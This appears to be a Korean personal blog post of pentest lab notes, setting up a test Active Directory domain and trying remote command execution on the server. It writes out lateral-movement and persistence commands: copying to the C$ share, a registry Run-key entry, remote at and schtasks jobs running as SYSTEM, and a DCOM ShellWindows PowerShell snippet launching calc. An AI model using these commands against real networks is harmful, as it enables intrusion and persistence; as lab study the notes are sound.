AD 서버 원격 명령어 테스트

SaltLee 2019. 4. 10. 15:04

AD 서버 : Windows Server 2008

AD 클라이언트 : Windows 7 Professional


[AD 서버 구축]

실행 > dcpromo > 대부분 기본 설정으로 두고 Next..

Create a new domain in a new forest

FQDN of the forest root domain : adtest2.com

Forest functional level : Windows Server 2008

아래 창 뜨는것은 현재 동적IP 사용하고 있기 때문 > 그냥 Yes 클릭 

나머지도 그냥 Next 하고 설정 다 끝나면 재부팅

AD 서버 IP 확인(


[AD 클라이언트 구축]

DNS를 AD 서버 IP(로 설정

컴퓨터 속성 > 설정 변경 > 변경

Domain : adtest2.com



[AD 서버 계정]

Administrator(Administrators, Domain Admins)


pentest(Domain Admins)


[AD 클라이언트 계정]

NONAD\Administrator (본인것)

NONAD\HI (본인것)

ADTEST2\Administrator (AD것) 


ADTEST2\pentest (AD것) 


1. xcopy.exe

xcopy test.txt "\\\C$\"

서버에 test.txt 생성됨(C:\)


2. reg.exe

reg add \\\HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v pentest /t REG_SZ /d "command to run"

서버에 레지스트리 생성됨(regedit)


3. at.exe

at \\ 12:34 cmd.exe /c "command to run"

서버에 작업 생성됨(Task Scheduler)


4. schtasks.exe

schtasks /create /tn pentest /tr C:\Windows\temp\pentest.exe /sc once /st 00:00 /S /RU System

서버에 작업 생성됨(Task Scheduler)



dcom 원격 명령은 135 포트와 임의포트를 사용하는데 방화벽 기본 설정에 임의포트 대역이 다 막혀있는듯 하다

방화벽 Off 로 바꿔줘야 테스트 됨(Windows Firewall > Change Settings > Off)


아래 명령어 파워쉘에서 실행 

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)

서버에서 계산기 프로그램 실행됨


참고 : https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P3-Exploita

